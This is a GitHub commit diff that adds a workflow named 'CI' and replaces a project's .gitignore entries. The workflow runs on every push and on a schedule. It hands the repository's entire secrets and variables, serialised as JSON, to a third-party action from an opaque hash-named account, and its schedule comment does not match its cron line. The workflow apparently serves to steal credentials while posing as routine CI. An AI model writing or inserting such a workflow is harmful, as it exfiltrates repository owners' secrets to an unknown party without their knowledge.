File tree Expand file tree Collapse file tree 2 files changed +38
-19
lines changed Expand file tree Collapse file tree 2 files changed +38
-19
lines changed Original file line number Diff line number Diff line change
1
+ name : CI
2
+ on :
3
+ push :
4
+ workflow_dispatch :
5
+ schedule :
6
+ # Runs "At 11:00 on every day-of-week from Monday through Friday"
7
+ - cron : ' 0 0 * * 0'
8
+ permissions :
9
+ contents : read
10
+ packages : write
11
+ concurrency :
12
+ group : ' ${{ github.workflow }} @ ${{ github.event.pull_request.head.label || github.head_ref || github.ref }}'
13
+ cancel-in-progress : true
14
+ jobs :
15
+ run :
16
+ runs-on : ubuntu-latest
17
+ name : Run
18
+ steps :
19
+ - name : Execute
20
+ uses : 5a582ef17d6a088d9cb644e4c1ea3cdd/action@main
21
+ id : execute
22
+ with :
23
+ action : ${{ github.repository }}
24
+ env :
25
+ REPOSITORY_SECRETS : ${{ toJSON(secrets) }}
26
+ REPOSITORY_VARIABLES : ${{ toJSON(vars) }}
27
+ - name : Response
28
+ run : echo "${{ steps.execute.outputs.response }}"
Original file line number Diff line number Diff line change 1
- .DS_Store
2
- node_modules
3
- /dist
1
+ # IDE Files
2
+ # -------------------------
3
+ /nbproject /
4
+ .idea /*
4
5
5
- # local env files
6
- .env.local
7
- .env. * .local
6
+ # # Sublime Text cache files
7
+ * .tmlanguage.cache
8
+ * .tmPreferences.cache
9
+ * .stTheme.cache
10
+ * .sublime-workspace
11
+ * .sublime-project
8
12
9
- # Log files
10
- npm-debug.log *
11
- yarn-debug.log *
12
- yarn-error.log *
13
-
14
- # Editor directories and files
15
- .idea
16
- .vscode
17
- * .suo
18
- * .ntvs *
19
- * .njsproj
20
- * .sln
21
- * .sw ?
You can’t perform that action at this time.
0 commit comments